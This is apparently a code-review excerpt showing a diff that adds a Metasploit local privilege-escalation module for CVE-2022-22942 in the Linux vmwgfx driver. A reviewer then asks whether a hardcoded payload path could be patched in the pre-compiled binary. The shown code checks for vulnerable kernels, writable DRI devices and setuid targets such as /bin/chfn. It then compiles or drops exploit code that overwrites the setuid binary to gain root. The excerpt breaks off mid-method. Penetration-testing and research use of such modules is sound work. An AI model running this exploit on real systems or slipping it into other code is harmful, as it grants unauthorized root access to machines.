modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb

```diff
@@ -0,0 +1,178 @@
+    # Check the kernel version to see if its in a vulnerable range
+    release = kernel_release
+    unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&
+           Rex::Version.new(release) < Rex::Version.new('5.17-rc1')
+      return CheckCode::Safe("Kernel version #{release} is not vulnerable")
+    end
+
+    vprint_good "Kernel version #{release} appears to be vulnerable"
+
+    @driver = nil
+
+    if writable?('/dev/dri/card0') # ubuntu
+      @driver = '/dev/dri/card0'
+    elsif writable?('/dev/dri/renderD128') # debian
+      @driver = '/dev/dri/renderD128'
+    else
+      return CheckCode::Safe('Unable to write to /dev/dri/card0 or /dev/dri/renderD128')
+    end
+    vprint_good("#{@driver} found writable")
+
+    @suid_target = nil
+    if setuid?('/bin/chfn') # ubuntu
+      @suid_target = '/bin/chfn'
+    elsif writable?('/bin/chage') # RHEL/Centos
+      @suid_target = '/bin/chage'
+    else
+      return CheckCode::Safe('Unable to write to /bin/chfn or /bin/chage')
+    end
+    vprint_good("#{@suid_target} suid binary found")
+
+    vmwgfx = cmd_exec('modinfo vmwgfx | grep version')
+    if vmwgfx.include? 'version'
+      return CheckCode::Appears('vmwgfx installed')
+    end
+
+    CheckCode::Safe('Vulnerable driver (vmwgfx) not found')
+  end
+
+  def exploit
+    # Check if we're already root
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    # Make sure we can write our exploit and payload to the local system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # backup the suid binary before we overwrite it
+    @suid_backup = read_file(@suid_target)
+    path = store_loot(
+      @suid_target,
+      'application/octet-stream',
+      rhost,
+      @suid_backup,
+      @suid_target
+    )
+    print_good("Original #{@suid_target} backed up to #{path}")
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+      c_code = exploit_data('CVE-2022-22942', 'cve-2022-22942-dc.c')
+      c_code = c_code.gsub('/dev/dri/card0', @driver) # ensure the right driver device is called
+      c_code = c_code.gsub('/bin/chfn', @suid_target) # ensure we have our suid target
+      c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload
+
+      upload_and_compile executable_path, strip_comments(c_code)
+      register_files_for_cleanup(executable_path)
+    else
+      unless @suid_target == '/bin/chfn'
+        fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems')
+      end
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      payload_path = '/tmp/.aYd3GAMlK'
```

Comment:
Couldn't this path be de-hardcoded by searching'n'replacing it in the pre-compiled binary?